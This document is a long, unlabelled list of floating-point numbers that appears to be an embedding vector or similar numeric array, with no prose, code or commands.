-0.03428897261619568, -0.0005608092760667205, -0.0031967023387551308, -0.009581162594258785, 0.020493241026997566, 0.05481083318591118, 0.008121448568999767, 0.018775930628180504, -0.03929779306054115, 0.02614605613052845, -0.060277607291936874, 0.003939081449061632, -0.017831409350037575, 0.004110812675207853, -0.015856502577662468, 0.028550291433930397, 0.016758089885115623, -0.021022746339440346, 0.016858266666531563, 0.013452267274260521, -0.012457658536732197, 0.005083955358713865, 0.015212510712444782, 0.011341406032443047, -0.013745641335844994, 0.021752603352069855, 0.001860419986769557, -0.014489809051156044, -0.011591847985982895, 0.01524113304913044, -0.008014116436243057, -0.008915704675018787, 0.002420334843918681, -0.0072305938228964806, 0.01916232518851757, 0.023570090532302856, -0.008937171660363674, 0.0066903564147651196, -0.02170966938138008, 0.004064301960170269, -0.006314694881439209, -0.0049158018082380295, 0.04573770985007286, -0.031054703518748283, -0.006729711312800646, -0.04585219547152519, -0.04035680368542671, 0.023441292345523834, 0.009466675110161304, -0.003352333791553974, 0.010539994575083256, 0.027791813015937805, -0.057415422052145004, 0.016028232872486115, 0.008557931520044804, 0.026704182848334312, 0.007949717342853546, -0.016028232872486115, 0.00008720718324184418, 0.023369736969470978, -0.032228197902441025, -0.03448932245373726, 0.03792394697666168, 0.017387771978974342, 0.0036635962314903736, -0.027247997000813484, -0.0025562886148691177, 0.009760049171745777, 0.01195677649229765, -0.03778083622455597, -0.014869049191474915, 0.01927681267261505, -0.026961779221892357, -0.012250149622559547, 0.002495467197149992, -0.030882971361279488, 0.014203591272234917, -0.05275006219744682, 0.021981578320264816, -0.005667125340551138, 0.022926097735762596, -0.025859838351607323, 0.02824976108968258, 0.015942368656396866, -0.015484418720006943, -0.013945993967354298, 0.023956485092639923, 0.02985258586704731, 0.009337876923382282, -0.011148208752274513, 0.03998471796512604, 0.013623998500406742, 0.0038782600313425064, -0.006958686280995607, 0.015040780417621136, -0.009345032274723053, -0.003522275947034359, 0.019076460972428322, 0.003203857922926545, -0.0038317495491355658, -0.030024316161870956, 0.004901491105556488, -0.005892522633075714, -0.012901296839118004, -0.0017199940048158169, 0.045136649161577225, -0.02055048570036888, 0.007012352347373962, -0.03111194632947445, 0.020378753542900085, -0.04679671674966812, 0.029366014525294304, 0.01001049019396305, 0.008922860026359558, 0.014253679662942886, -0.00764918839558959, 0.0002732491702772677, 0.01100509986281395, 0.0032825679518282413, -0.012829742394387722, 0.020478930324316025, -0.009144679643213749, 0.032027844339609146, 0.000965092855039984, 0.007856696844100952, 0.02973809838294983, 0.019076460972428322, 0.04141581058502197, -0.0257310401648283, -0.0151838893070817, 0.007305725943297148, 0.02890806458890438, -0.062395624816417694, -0.024901006370782852, 0.025316022336483, -0.011928154155611992, -0.014754561707377434, -0.017001375555992126, -0.02774887904524803, 0.013273380696773529, 0.006908597890287638, -0.006325427908450365, -0.027076266705989838, -0.0028353515081107616, 0.020478930324316025, -0.028750644996762276, 0.006990885827690363, 0.012607922777533531, -0.0054631950333714485, -0.026732804253697395, 0.005674281157553196, -0.005928299855440855, -0.01767398975789547, -0.02085101418197155, 0.00374230626039207, -0.0008689413662068546, 0.019004905596375465, 0.0028854398988187313, 0.030653996393084526, -0.007434524595737457, 0.01800314150750637, 0.009180457331240177, 0.01164909079670906, -0.018575577065348625, -0.019978048279881477, 0.02213899791240692, -0.008715352043509483, -0.034975893795490265, -0.02286885492503643, -0.006661734543740749, 0.01249343529343605, -0.005116154905408621, 0.02212468720972538, 0.0126580111682415, 0.005735102575272322, 0.04009920731186867, 0.044621456414461136, 0.0023362580686807632, 0.020078225061297417, -0.012042641639709473, 0.024915317073464394, 0.003064326476305723, 0.001664539217017591, 0.002615321194753051, 0.04198824614286423, -0.04857127368450165, 0.011548914946615696, 0.02953774482011795, -0.02401372790336609, 0.002184204524382949, -0.040471289306879044, -0.02263987995684147, -0.008779751136898994, -0.015398552641272545, -0.019105082377791405, 0.011083809658885002, -0.0009767204755917192, -0.003071481827646494, -0.03437483683228493, 0.018919039517641068, 0.010296708904206753, -0.012779654003679752, -0.03494727239012718, -0.005473928060382605, -0.02699040062725544, -0.015827881172299385, 0.0006533830892294645, -0.000495068496093154, -0.00936649926006794, -0.00915899034589529, 0.00748461252078414, 0.0238276869058609, -0.01598530076444149, 0.009130368940532207, -0.049057845026254654, -0.015326998196542263, -0.008794061839580536, 0.007735054008662701, 0.0061501190066337585, 0.002382768550887704, 0.009817292913794518, 0.029909828677773476, -0.026002947241067886, -0.02298334240913391, 0.0020035291090607643, -0.01999235898256302, 0.009180457331240177, -0.025115670636296272, 0.014203591272234917, 0.027276618406176567, 0.002923005959019065, -0.022081753239035606, -0.012929919175803661, -0.003971280995756388, 0.021638115867972374, -0.003647496458142996, 0.02561655268073082, 0.006783377379179001, 0.004092923831194639, -0.010582927614450455, 0.01778847724199295, -0.0078066084533929825, -0.01883317530155182, 0.015055091120302677, 0.0038925709668546915, 0.01429661177098751, 0.0013801095774397254, 0.024471677839756012, -0.007112528663128614, -0.004361253697425127, 0.012665166519582272, -0.014368166215717793, 0.01438963320106268, -0.037065289914608, 0.016643604263663292, -0.01094785612076521, -0.017316216602921486, 0.015799259766936302, -0.03142678737640381, 0.0219243336468935, -0.015112334862351418, 0.030196046456694603, -0.0034113661386072636, -0.03589179366827011, -0.03760910406708717, -0.012715254910290241, -0.0022253484930843115, 0.02508704736828804, -0.029394635930657387, 0.02550206519663334, 0.002168104751035571, 0.004368409048765898, -0.00595334405079484, 0.021666737273335457, -0.012142818421125412, 0.039956096559762955, -0.004450696986168623, 0.005134043749421835, 0.0006189474370330572, -0.00031931247212924063, -0.002184204524382949, -0.03832465037703514, -0.00417878944426775, 0.011026565916836262, 0.01650049351155758, -0.02232503890991211, -0.04167340695858002, -0.028950996696949005, -0.0036743294913321733, 0.011999708600342274, 0.017416393384337425, 0.006915753707289696, 0.035949040204286575, 0.01684395596385002, 0.022367972880601883, -0.017502259463071823, 0.00825024675577879, 0.008500687777996063, -0.012085574679076672, 0.0013005051296204329, 0.010554305277764797, 0.0005858534132130444, 0.04742639884352684, -0.003382744500413537, -0.0019140859367325902, 0.029566366225481033, 0.013824351131916046, -0.015527351759374142, 0.00497304555028677, -0.017330527305603027, 0.02275436744093895, 0.01417496893554926, -0.007001618854701519, -0.00415732292458415, 0.011484515853226185, -0.005305774509906769, 0.023112140595912933, -0.020049603655934334, 0.004665360786020756, -0.005259264260530472, 0.021623805165290833, -0.03331582993268967, -0.0020911835599690676, -0.0010697414400056005, 0.013409335166215897, -0.013180360198020935, -0.004776270594447851, 0.02361302264034748, 0.03302960842847824, 0.023856308311223984, 0.012314548715949059, -0.01927681267261505, 0.0220101997256279, -0.017716921865940094, 0.0078066084533929825, 0.019949426874518394, -0.04565184563398361, -0.03451794758439064, 0.026289165019989014, -0.030739862471818924, -0.02996707335114479, -0.021766914054751396, -0.001880097552202642, 0.027348173782229424, -0.0188617967069149, -0.00022550883295480162, -0.03566281870007515, 0.04817056655883789, 0.019419921562075615, -0.013895906507968903, -0.017130175605416298, -0.013466578908264637, -0.02920859307050705, -0.005677858833223581, -0.028192518278956413, 0.003071481827646494, 0.026217611506581306, -0.0004932796000503004, -0.0027816856745630503, 0.006840621121227741, -0.002277225721627474, 0.00423603318631649, 0.00033004567376337945, -0.0166292916983366, -0.050145473331213, -0.019233880564570427, -0.020393064245581627, -0.024299947544932365, -0.01439678855240345, -0.055097054690122604, -0.0476553738117218, -0.0026385763194411993, -0.008493532426655293, 0.03211371228098869, 0.018575577065348625, -0.023155072703957558, 0.006203785073012114, 0.008457755669951439, 0.002863973379135132, 0.011298473924398422, 0.00024999392917379737, -0.04316174238920212, 0.011327095329761505, 0.004246766213327646, -0.04316174238920212, 0.007073173765093088, 0.01565614901483059, -0.002475789748132229, -0.02793492190539837, -0.003205646760761738, -0.022367972880601883, -0.013817195780575275, -0.004980201367288828, 0.051605187356472015, -0.0008720718906261027, -0.013259069994091988, -0.009252011775970459, 0.022382283583283424, -0.011305629275739193, 0.032342687249183655, -0.010117822326719761, -0.004965890198945999, -0.02816389687359333, 0.02584552764892578, 0.0005460511310957372, 0.015284066088497639, -0.023126451298594475, -0.022382283583283424, 0.012364637106657028, -0.014031860046088696, -0.02296903170645237, 0.018260737881064415, 0.011198297142982483, 0.002915850607678294, 0.010518528521060944, 0.025129981338977814, 0.005395217798650265, 0.04084337502717972, 0.006060675717890263, -0.007073173765093088, -0.018031762912869453, -0.011999708600342274, -0.003001715987920761, -0.031283676624298096, 0.027033332735300064, -0.0018944083712995052, -0.0025062004569917917, -0.007470301818102598, 0.029566366225481033, -0.0032772014383226633, -0.00851499941200018, 0.018818862736225128, 0.008271713741123676, -0.008808373473584652, -0.042904146015644073, -0.021781224757432938, 0.029995694756507874, -0.01281543169170618, 0.0026904535479843616, -0.010375418700277805, -0.027333863079547882, -0.00947383139282465, -0.006032053846865892, -0.019520098343491554, 0.001980273984372616, 0.002618898870423436, -0.01990649290382862, 0.01851833425462246, -0.016886889934539795, -0.023856308311223984, 0.025129981338977814, -0.040614400058984756, -0.009330721572041512, 0.009387965314090252, 0.00020191818475723267, 0.017187418416142464, -0.038782600313425064, -0.03600628301501274, 0.03099745884537697, 0.017817098647356033, -0.016056856140494347, -0.024901006370782852, -0.00047539095976389945, -0.03537660092115402, -0.01253636833280325, -0.007491768337786198, 0.012235838919878006, -0.0102609321475029, -0.005692169535905123, -0.03331582993268967, 0.007720742840319872, 0.001985640497878194, -0.008336112834513187, 0.01808900572359562, 0.019319746643304825, -0.0028908064123243093, 0.013573910109698772, -0.011334250681102276, 0.017416393384337425, 0.013903061859309673, -0.011334250681102276, -0.026646938174962997, 0.00468324963003397, 0.033602047711610794, -0.010575772263109684, -0.00915899034589529, -0.011076654307544231, 0.0038925709668546915, 0.004103657323867083, -0.03374515473842621, -0.030425021424889565, 0.016142720356583595, 0.029251527041196823, -0.00759910000488162, -0.00177365995477885, -0.00820015836507082, 0.01873299852013588, -0.0024382234551012516, 0.01117683108896017, -0.02401372790336609, 0.00379955000244081, 0.009688494727015495, 0.007015930023044348, -0.025974325835704803, 0.02158087119460106, 0.015928057953715324, 0.024943938478827477, -0.000763845513574779, 0.004847825039178133, 0.03881122171878815, 0.009702805429697037, -0.0034757654648274183, -0.012944229878485203, -0.015555973164737225, -0.0151409562677145, 0.00011549361806828529, 0.009287788532674313, -0.021566560491919518, -0.0062395622953772545, 0.020493241026997566, -0.009881692007184029, -0.018360914662480354, 0.0026224765460938215, 0.016886889934539795, 0.014883359894156456, 0.000861785898450762, -0.0004042835789732635, -0.00014568072219844908, -0.029995694756507874, -0.008092827163636684, -0.03197060152888298, 0.0008412139141000807, -0.02773456834256649, -0.015498729422688484, -0.007985495030879974, -0.015398552641272545, 0.009244856424629688, -0.008829839527606964, 0.007441679947078228, 0.014439721591770649, -0.0030786371789872646, -0.004801314789801836, -0.03468967601656914, 0.014461187645792961, -0.02996707335114479, -0.029480502009391785, 0.033487558364868164, 0.010883457027375698, 0.01333777979016304, -0.008207314647734165, 0.025172913447022438, 0.0022486038506031036, -0.008736818097531796, 0.015455796383321285, 0.013101649470627308, 0.0074559906497597694, -0.009080280549824238, -0.020994123071432114, 0.013745641335844994, 0.016958443447947502, -0.0006985519430600107, 0.010711725801229477, 0.0027119198348373175, -0.003617085749283433, -0.05383769050240517, 0.038267407566308975, -0.016157031059265137, 0.00426465505734086, 0.0021591605618596077, 0.038381896913051605, 0.005581259727478027, 0.009280633181333542, -0.01524113304913044, 0.003974858671426773, -0.0015151689294725657, -0.02402804046869278, 0.0539521798491478, -0.03385964408516884, -0.010439818724989891, 0.027691636234521866, -0.026646938174962997, -0.02644658461213112, -0.006282495334744453, 0.04771261662244797, -0.012314548715949059, -0.01873299852013588, -0.031140567734837532, -0.031197812408208847, 0.005162665620446205, -0.0072198607958853245, -0.015498729422688484, 0.01535562053322792, 0.03219957649707794, 0.013173204846680164, 0.0064470707438886166, -0.014353855513036251, -0.006840621121227741, -0.024271326139569283, -0.021623805165290833, -0.0060857199132442474, 0.012300238013267517, -0.03165576234459877, -0.005062488839030266, 0.02996707335114479, 0.02953774482011795, -0.017430704087018967, 0.014668695628643036, -0.01322329230606556, -0.019963737577199936, 0.017101552337408066, -0.011706334538757801, 0.0031233588233590126, 0.003928348422050476, -0.015269754454493523, -0.016242897137999535, 0.003906881902366877, 0.01843246817588806, -0.0074559906497597694, 0.005380907095968723, -0.009795826859772205, 0.006593757774680853, -0.021881401538848877, 0.0188617967069149, 0.008099982514977455, -0.020063914358615875, -0.00932356622070074, 0.0019033527933061123, 0.004021369386464357, 0.0002084028092212975, -0.017530880868434906, 0.0008966687601059675, 0.029795341193675995, 0.0018335869535803795, -0.003060748567804694, 0.0034346214961260557, 0.027777500450611115, -0.0063468944281339645, -0.004160901065915823, 0.010647326707839966, -0.013538133352994919, 0.00510899955406785, -0.008042738772928715, -0.019348368048667908, -0.016128409653902054, -0.001247733598574996, -0.01243619155138731, 0.01851833425462246, -0.011026565916836262, -0.018375225365161896, 0.01883317530155182, 0.014017549343407154, -0.008014116436243057, -0.03717977926135063, -0.003795972326770425, -0.02139483019709587, -0.021151544526219368, 0.015341308899223804, -0.03071124106645584, -0.004729759879410267, -0.007133995182812214, 0.01079043559730053, 0.10017646104097366, 0.02699040062725544, -0.03514762595295906, 0.012114196084439754, -0.013123116455972195, -0.01164193544536829, -0.008915704675018787, -0.035834550857543945, -0.018675753846764565, -0.00852931011468172, 0.006003431975841522, 0.0037530395202338696, -0.018389536067843437, 0.013423645868897438, 0.014697317965328693, -0.02700471132993698, 0.012064107693731785, 0.008930016309022903, -0.0014597141416743398, 0.019763384014368057, -0.02699040062725544, 0.008536465466022491, 0.015942368656396866, -0.018818862736225128, 0.020035292953252792, -0.004847825039178133, -0.036664582788944244, -0.005041022785007954, -0.00362603017129004, -0.01959165371954441, 0.0029247947968542576, -0.003552686655893922, 0.006937219761312008, 0.0018639976624399424, 0.013874439522624016, 0.017602434381842613, 0.017402082681655884, -0.011105276644229889, -0.025358956307172775, -0.026646938174962997, 0.009695650078356266, -0.005971232429146767, 0.015527351759374142, -0.010539994575083256, 0.0049694678746163845, -0.02126603201031685, 0.03188473731279373, 0.006107186432927847, -0.011319939978420734, -0.016471872106194496, -0.002803151961416006, -0.02583121508359909, 0.010697415098547935, -0.00030254185548983514, -0.018360914662480354, -0.0011430849554017186, -0.00008782211079960689, 0.004296854604035616, -0.015928057953715324, 0.031713005155324936, 0.020464619621634483, 0.008894238620996475, 0.015498729422688484, -0.020693594589829445, -0.0013228659518063068, -0.0018219593912363052, -0.008758285082876682, -0.002318369457498193, -0.013516666367650032, 0.017216039821505547, -0.014783183112740517, -0.0012987162917852402, -0.005778035148978233, -0.006171585526317358, 0.009252011775970459, 0.019605964422225952, -0.013344936072826385, 0.004289699252694845, -0.005087533034384251, -0.03580592945218086, 0.03883984312415123, 0.022410904988646507, -0.0007678704569116235, 0.012557835318148136, -0.0012915608240291476, 0.01417496893554926, 0.007935406640172005, -0.009545385837554932, 0.010718881152570248, -0.009087435901165009, -0.02326956018805504, 0.008736818097531796, 0.02000666968524456, 0.008786906488239765, 0.0033362340182065964, 0.02105136774480343, -0.0024972560349851847, 0.020350132137537003, -0.013430801220238209, -0.005312930326908827, 0.012056952342391014, -0.01618565432727337, 0.0060857199132442474, -0.008600864559412003, -0.0071769277565181255, -0.0027423305436968803, -0.02709057740867138, 0.022382283583283424, -0.005176976323127747, -0.005180553998798132, -0.04150167480111122, -0.00019655158394016325, -0.00003398844273760915, -0.0372370220720768, -0.030940216034650803, 0.007820919156074524, -0.012200062163174152, 0.014883359894156456, 0.0021698935888707638, -0.010547149926424026, -0.02062203921377659, -0.018074695020914078, 0.039126064628362656, 0.0020929723978042603, 0.003756617195904255, 0.013953150250017643, 0.010511373169720173, 0.002767374739050865, 0.02965223230421543, -0.0018926195334643126, 0.028206828981637955, -0.013166049495339394, 0.018360914662480354, -0.02796354331076145, 0.013817195780575275, -0.024629097431898117, 0.005259264260530472, -0.02263987995684147, -0.016743779182434082, 0.009896003641188145, -0.00851499941200018, 0.02550206519663334, 0.002699397737160325, 0.008006961084902287, 0.010096356272697449, 0.0009328933083452284, -0.03924055024981499, -0.0018425313755869865, 0.0051233102567493916, 0.013344936072826385, -0.009345032274723053, -0.02616036683320999, 0.0024096015840768814, 0.015899434685707092, 0.020278578624129295, -0.016271518543362617, 0.0028317738324403763, -0.02942325733602047, 0.020092535763978958, -0.01800314150750637, -0.0204359982162714, 0.018346603959798813, 0.02149500697851181, -0.007899629883468151, 0.0005357651971280575, 0.006561558227986097, 0.008142915554344654, -0.026918845251202583, -0.026317786425352097, -0.021351896226406097, 0.005345129873603582, 0.017015688121318817, -0.026088813319802284, -0.013953150250017643, 0.022096065804362297, 0.01914801448583603, -0.024471677839756012, 0.0031179923098534346, -0.0022754366509616375, -0.004597384016960859, 0.0038031276781111956, -0.0058424342423677444, -0.00581739004701376, -0.0014454032061621547, 0.010096356272697449, -0.012207217514514923, -0.0022951143328100443, -0.007799453102052212, -0.02253970317542553, 0.027262307703495026, 0.003552686655893922, 0.02920859307050705, -0.0035687864292412996, -0.015598906204104424, -0.004665360786020756, -0.041329946368932724, 0.029194282367825508, -0.008679574355483055, 0.006371938623487949, 0.018661443144083023, -0.023326804861426353, -0.007606255356222391, 0.006786955054849386, -0.006608068477362394, -0.005055333487689495, 0.0032306909561157227, 0.04622428119182587, 0.019133703783154488, -0.011713490821421146, -0.009516763500869274, 0.013831507414579391, -0.0005357651971280575, 0.010303864255547523, 0.04190238192677498, 0.002084028208628297, -0.03345893695950508, -0.005116154905408621, -0.032743390649557114, 0.008944327011704445, -0.0136526208370924, -0.013380712829530239, 0.023970795795321465, 0.003076848341152072, 0.008064204826951027, -0.01195677649229765, -0.009466675110161304, 0.032142333686351776, 0.013008628971874714, 0.0008005172712728381, -0.007305725943297148, 0.009781516157090664, 0.01755950227379799, 0.00757047813385725, 0.003917614929378033, -0.008028428070247173, 0.005520438309758902, -0.03468967601656914, -0.015098023228347301, 0.008894238620996475, -0.011949620209634304, -0.004808470141142607, 0.025115670636296272, -0.0018058596178889275, 0.021552249789237976, 0.009531074203550816, -0.0002774977474473417, 0.027863366529345512, 0.019119393080472946, -0.0018309036968275905, 0.0017754489090293646, -0.01618565432727337, -0.02402804046869278, 0.015412864275276661, -0.005223487038165331, -0.015169578604400158, 0.014883359894156456, -0.029594989493489265, 0.029280148446559906, 0.030253291130065918, -0.02679004706442356, 0.00555621599778533, -0.019090771675109863, -0.009294944815337658, 0.009402276016771793, -0.011269851587712765, 0.011599003337323666, -0.02594570256769657, -0.003946236800402403, 0.0037101067136973143, -0.009495297446846962, -0.02740541659295559, 0.022496771067380905, -0.00033228175016120076, -0.023799065500497818, -0.018446778878569603, -0.01830366998910904, 0.0008635747362859547, -0.030281912535429, -0.012522057630121708, -0.0012441558064892888, 0.01967751979827881, 0.06645992398262024, -0.0019462854834273458, -0.051204483956098557, -0.03966987878084183, 0.0035455310717225075, -0.016171343624591827, -0.001801387406885624, 0.006686778739094734, -0.011284162290394306, -0.007584789302200079, -0.0029695164412260056, -0.018561266362667084, -0.025888459756970406, 0.017974520102143288, -0.0003284804115537554, -0.030653996393084526, 0.006786955054849386, 0.013988927006721497, -0.0018836752278730273, 0.004618850536644459, 0.0009409431950189173, 0.006515047512948513, 0.03729426488280296, -0.011334250681102276, -0.0055848378688097, -0.002382768550887704, -0.01111243199557066, -0.012099885381758213, 0.01777416653931141, 0.01992080546915531, -0.029251527041196823, -0.023011963814496994, 0.0071304175071418285, 0.008836994878947735, -0.005470350384712219, 0.007384436205029488, 0.027648702263832092, 0.009917469695210457, -0.017516570165753365, -0.0032145909499377012, 0.00767781026661396, -0.013981771655380726, -0.012042641639709473, -0.00862948689609766, 0.002366668777540326, -0.00592472217977047, 0.00841482263058424, -0.003107259050011635, 0.010232309810817242, 0.0008528415346518159, 0.007556167431175709, 0.030339157208800316, 0.009488142095506191, 0.007055284921079874, -0.0035204871091991663, 0.016672225669026375, 0.002459689974784851, 0.013566754758358002, -0.00318954698741436, -0.039526768028736115, 0.022782988846302032, -0.00921623408794403, -0.0023935018107295036, -0.0057064807042479515, 0.008429133333265781, 0.005985543597489595, -0.016557738184928894, 0.00054292066488415, -0.023469913750886917, -0.02667555958032608, 0.00582454539835453, -0.02073652669787407, -0.00420741131529212, 0.0013693764340132475, 0.010568616911768913, 0.0005464983405545354, -0.010733191855251789, -0.008057049475610256, -0.0223393514752388, 0.008014116436243057, 0.008844150230288506, -0.004568762145936489, 0.0011922788107767701, -0.010454129427671432, 0.010067733936011791, 0.013366402126848698, 0.01650049351155758, -0.015484418720006943, -0.006965841632336378, -0.005309352185577154, 0.007606255356222391, -0.009588317945599556, 0.008715352043509483, -0.006207362748682499, 0.026933157816529274, -0.0001530597946839407, -0.026231922209262848, -0.016242897137999535, -0.00677622202783823, 0.005341552197933197, 0.026088813319802284, 0.0015366353327408433, -0.029594989493489265, -0.026847291737794876, 0.019319746643304825, -0.010940700769424438, 0.027992164716124535, -0.012278771959245205, 0.0006985519430600107, 0.005495394580066204, 0.0069336420856416225, -0.0038210165221244097, 0.016114098951220512, 0.002554499777033925, -0.01000333484262228, 0.010647326707839966, 0.0030929481144994497, -0.013287692330777645, -0.007835229858756065, -0.0025473441928625107, -0.010389730334281921, 0.002951627830043435, 0.009545385837554932, 0.035004518926143646, 0.028235450387001038, -0.001049169572070241, -0.015527351759374142, 0.005867478437721729, 0.010468440130352974, 0.006396982353180647, 0.00592472217977047, -0.011455893516540527, -0.00932356622070074, -0.02242521569132805, -0.01423936802893877, -0.007749364711344242, -0.0074631464667618275, -0.00948098674416542, 0.01619996502995491, 0.005964077077805996, 0.0032271130476146936, -0.030425021424889565, -0.017974520102143288, -0.002252181526273489, 0.009588317945599556, -0.018446778878569603, -0.0078066084533929825, -0.008643797598779202, 0.0022003042977303267, -0.002702975645661354, 0.0648571029305458, 0.0026314209681004286, -0.012514902278780937, -0.008042738772928715, -0.0036385520361363888, -0.009545385837554932, 0.0108405239880085, 0.005717213731259108, 0.009559696540236473, 0.014146347530186176, -0.01800314150750637, -0.008808373473584652, -0.0026671981904655695, -0.020679283887147903, 0.0043397871777415276, 0.0055097052827477455, -0.01000333484262228, -0.001849686843343079, -0.0033773777540773153, 0.007828074507415295, -0.0032682570163160563, 0.011076654307544231, 0.007262793369591236, -0.00915899034589529, -0.001949863275513053, -0.012414725497364998, 0.005974810104817152, -0.01831798069179058, 0.005248530767858028, -0.0000201387101697037, -0.007763675879687071, 0.013373557478189468, 0.009724272415041924, 0.012221528217196465, 0.0011028355220332742, 0.006028476171195507, 0.001166340196505189, 0.0037530395202338696, -0.029165660962462425, 0.011448738165199757, 0.0265610720962286, 0.0038424828089773655, 0.012336015701293945, -0.01370986457914114, -0.029294459149241447, -0.017230350524187088, -0.004647472407668829, -0.0020768726244568825, -0.007080329116433859, 0.0431903637945652, -0.0022056710440665483, -0.003359489142894745, -0.004379142541438341, -0.034890029579401016, 0.055297404527664185, 0.0010849467944353819, 0.020278578624129295, -0.011985397897660732, 0.02478651888668537, -0.006568713579326868, -0.009502452798187733, 0.014439721591770649, 0.02783474512398243, -0.021566560491919518, 0.006210940424352884, 0.001955229789018631, 0.028178207576274872, 0.011792200617492199, -0.00457591749727726, -0.023999417200684547, -0.007985495030879974, -0.006647423841059208, 0.001650228281505406, 0.0005719896871596575, -0.024299947544932365, -0.006811999250203371, 0.0007168878219090402, 0.014697317965328693, -0.005405951291322708, 0.005083955358713865, 0.008057049475610256, 0.003956970293074846, -0.005144776776432991, 0.01936267875134945, -0.008343268185853958, -0.01980631798505783, -0.0075633227825164795, -0.0223393514752388, -0.022711435332894325, -0.0043290541507303715, -0.002400657394900918, 0.015312687493860722, -0.0010062367655336857, -0.012915607541799545, 0.0102609321475029, -0.008801217190921307, 0.013631153851747513, -0.006207362748682499, 0.013366402126848698, 0.003946236800402403, 0.008150070905685425, -0.0054560392163693905, -0.005402373615652323, -0.010811902582645416, 0.0056993248872458935, 0.017087241634726524, -0.01652911677956581, 0.00669751176610589, 0.005659969989210367, 0.0033129786606878042, -0.041329946368932724, 0.02105136774480343, 0.014683007262647152, 0.0039963251911103725, -0.0046725161373615265, 0.007384436205029488, -0.014010393992066383, 0.015212510712444782, -0.014604296535253525, -0.006121497135609388, -0.005459616892039776, 0.004125123377889395, 0.01243619155138731, -0.0038174386136233807, -0.0008385306573472917, 0.0038424828089773655, 0.012972851283848286, -0.024085283279418945, -0.015699082985520363, -0.00156078499276191, 0.01371701993048191, 0.02634640969336033, 0.006443493068218231, -0.0025294555816799402, 0.002672564936801791, 0.009802982211112976, 0.018174871802330017, 0.0003830408095382154, -0.017201729118824005, 0.013953150250017643, -0.021251721307635307, -0.004901491105556488, 0.0005939032998867333, -0.026732804253697395, 0.006225251592695713, -0.00044363862252794206, -0.021824156865477562, -0.017516570165753365, -0.010590082965791225, 0.007348658982664347, 0.012622234411537647, -0.020307200029492378, 0.011570381000638008, -0.007656343746930361, -0.004908646456897259, 0.004232455510646105, -0.01433954481035471, -0.033401694148778915, -0.010282398201525211, 0.023527156561613083, 0.005591993220150471, -0.008021272718906403, 0.004432808142155409, -0.0030088715720921755, 0.002024995628744364, 0.0015455796383321285, -0.009774360805749893, 0.012285927310585976, 0.018704377114772797, -0.005395217798650265, 0.005223487038165331, 0.0014364589005708694, -0.011498826555907726, 0.012371792457997799, 0.01906214840710163, 0.012064107693731785, 0.013881594873964787, 0.008142915554344654, -0.007656343746930361, 0.00819300301373005, -0.016758089885115623, 0.005402373615652323, 0.010418351739645004, 0.0042932769283652306, 0.009459519758820534, -0.006121497135609388, 0.010196532122790813, -0.011019410565495491, -0.04141581058502197, 0.007262793369591236, -0.012056952342391014, -0.026546761393547058, 0.015641838312149048, 0.0010751080699265003, 0.015470108017325401, 0.010969322174787521, -0.01439678855240345, 0.007792297750711441, 0.0015294798649847507, 0.015627527609467506, -0.0008228780934587121, -0.012572146020829678, 0.00017273731646128, -0.007878162898123264, 0.032571662217378616, -0.02530171163380146, -0.004550873301923275, 0.011885221116244793, -0.012793964706361294, -0.011570381000638008, -0.027863366529345512, 0.016257207840681076, -0.007005196996033192, -0.019648896530270576, -0.0010697414400056005, 0.006600913126021624, 0.0010357530554756522, -0.010425507090985775, 0.015928057953715324, 0.00015607850218657404, 0.0031430365052074194, 0.006529358681291342, 0.0007826286018826067, -0.013208981603384018, -0.017731232568621635, 0.006683201063424349, 0.0034668210428208113, -0.0001243261358467862, 0.003670751815661788, 0.010089200921356678, 0.01428230106830597, 0.011441582813858986, -0.007327192462980747, 0.02253970317542553, 0.022181930020451546, 0.002431068103760481, -0.005248530767858028, -0.0017951263580471277, 0.01106234360486269, -0.007044551894068718, 0.005685014184564352, -0.000037873633118579164, 0.0024471678771078587, -0.003849638160318136, -0.005430995021015406, 0.008400511927902699, 0.0017978097312152386, -0.019763384014368057, -0.01255067903548479, -0.012049796991050243, 0.00581739004701376, -0.005341552197933197, -0.00664026802405715, -0.00007775973790558055, -0.01672946847975254, 0.0018765197601169348, -0.015126645565032959, 0.021337585523724556, -0.014096259139478207, 0.010139289312064648, -0.004024947062134743, 0.011591847985982895, -0.00024239125195890665, 0.0009516763966530561, -0.023956485092639923, 0.006286073010414839, 0.007856696844100952, 0.007506079040467739, 0.022468149662017822, -0.0023130029439926147, -0.01568477228283882, 0.02275436744093895, -0.0014534530928358436, 0.010683104395866394, 0.00214306078851223, 0.014683007262647152, 0.005899677984416485, 0.02191002294421196, -0.025029804557561874, -0.002386346459388733, -0.0020965503063052893, 0.013187515549361706, -0.024285636842250824, 0.0017861820524558425, 0.0223393514752388, -0.012178595177829266, -0.004042835906147957, 0.031054703518748283, -0.006515047512948513, -0.00863664224743843, 0.018174871802330017, 0.0022861699108034372, 0.010031957179307938, 0.005287886131554842, 0.014589985832571983, -0.003749461844563484, -0.0029838273767381907, -0.009717117063701153, -0.020135467872023582, 0.027591459453105927, -0.013115961104631424, 0.02286885492503643, 0.018461091443896294, -0.000023353079086518846, -0.04602392762899399, -0.013208981603384018, -0.032743390649557114, -0.008293179795145988, -0.010819057933986187, 0.01798883080482483, -0.0060392096638679504, -0.006786955054849386, -0.008944327011704445, -0.0055633713491261005, 0.008078515529632568, 0.004640316590666771, 0.003423888236284256, -0.01461860816925764, 0.014625763520598412, -0.004214566666632891, 0.0020518286619335413, 0.008171536959707737, -0.0032163800206035376, 0.012128506787121296, -0.011327095329761505, -0.0020267844665795565, -0.003566997591406107, 0.010525683872401714, -0.012006863951683044, 0.01010351162403822, 0.0166292916983366, -0.00674760015681386, 0.008743973448872566, 0.010282398201525211, 0.019849250093102455, 0.00852215476334095, -0.008135759271681309, -0.011620469391345978, 0.011048032902181149, 0.009659873321652412, 0.025129981338977814, 0.01630014181137085, -0.009438053704798222, -0.006754755508154631, -0.021537939086556435, 0.018475402146577835, -0.008386201225221157, -0.006504314485937357, 0.007577633485198021, 0.002942683408036828, 0.005241375416517258, -0.02762008085846901, -0.00024306208069901913, 0.016343073919415474, 0.0001749733928591013, 0.0012531002284958959, -0.0014024703996255994, 0.010933545418083668, -0.018990594893693924, 0.005788768175989389, -0.015913745388388634, 0.006837043445557356, 0.005269997287541628, 0.016572048887610435, -0.018146250396966934, -0.002178838010877371, 0.004021369386464357, 0.00069094926584512, 0.004568762145936489, 0.0029498389922082424, -0.028636157512664795, 0.0013675875961780548, 0.012500591576099396, 0.0042932769283652306, -0.0050231339409947395, -0.005642081145197153, 0.005430995021015406, 0.02454323321580887, -0.022367972880601883, -0.019319746643304825, 0.0025187223218381405, -0.030224669724702835, -0.022511081770062447, 0.015226822346448898, 0.004776270594447851, 